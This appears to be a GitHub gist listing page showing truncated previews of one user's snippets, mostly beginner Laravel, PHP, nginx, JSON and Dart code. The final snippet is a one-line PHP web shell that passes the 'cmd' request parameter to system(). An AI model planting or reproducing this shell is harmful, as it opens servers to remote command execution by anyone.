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rizkytegar /
Last active May 23, 2024 03:48
Domain Driven Design on Laravel

Example Src

├── UserManagement/
│   ├── Application/
│   ├── Domain/
│   │   ├── Entities/
│   │   ├── Repositories/
│   │   └── Services/
location /storage {
alias /var/www/html/storage;
index index.xml;
# Set custom error pages for 404 and 403
error_page 404 /storage/404.xml;
error_page 403 /storage/403.xml;
# Allow serving only whitelisted file extensions
location ~* \.(js|css|png|jpg|jpeg|gif|ico|svg|docx|doc|pdf|ppt|pptx)$ {
use Illuminate\Foundation\Application;
use Illuminate\Foundation\Configuration\Exceptions;
use Illuminate\Foundation\Configuration\Middleware;
use Illuminate\Http\Request;
use Symfony\Component\HttpKernel\Exception\NotFoundHttpException;
use Symfony\Component\HttpKernel\Exception\MethodNotAllowedHttpException;
class Nasabah {
private $nama;
private $saldo;
public function __construct($nama, $saldo) {
$this->nama = $nama;
$this->saldo = $saldo;
"nama_barang": "Pensil",
"kodebarang": "P001",
"sisa_stok": 50
"nama_barang": "Penghapus",
"kodebarang": "P002",
"sisa_stok": 30
$website = \App\Webs::get();
@foreach ($website as $xasi)
<!doctype html>
<html class="no-js" lang="zxx">
import 'dart:io';
void main() {
String nama, jenisKelamin, tanggalLahir;
while (true) {
stdout.write('Masukkan nama: ');
nama = stdin.readLineSync()!;
if (nama.isNotEmpty) {
// Definisikan kelas 'Person'
class Mahasiswa {
// Properties atau atribut
public $name;
public $nim;
// Constructor untuk menginisialisasi objek
public function __construct($name, $nim) {
$this->name = $name;
function e($value, $doubleEncode = true)
if ($value instanceof DeferringDisplayableValue) {
$value = $value->resolveDisplayableValue();
if ($value instanceof Htmlable) {
return $value->toHtml();
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>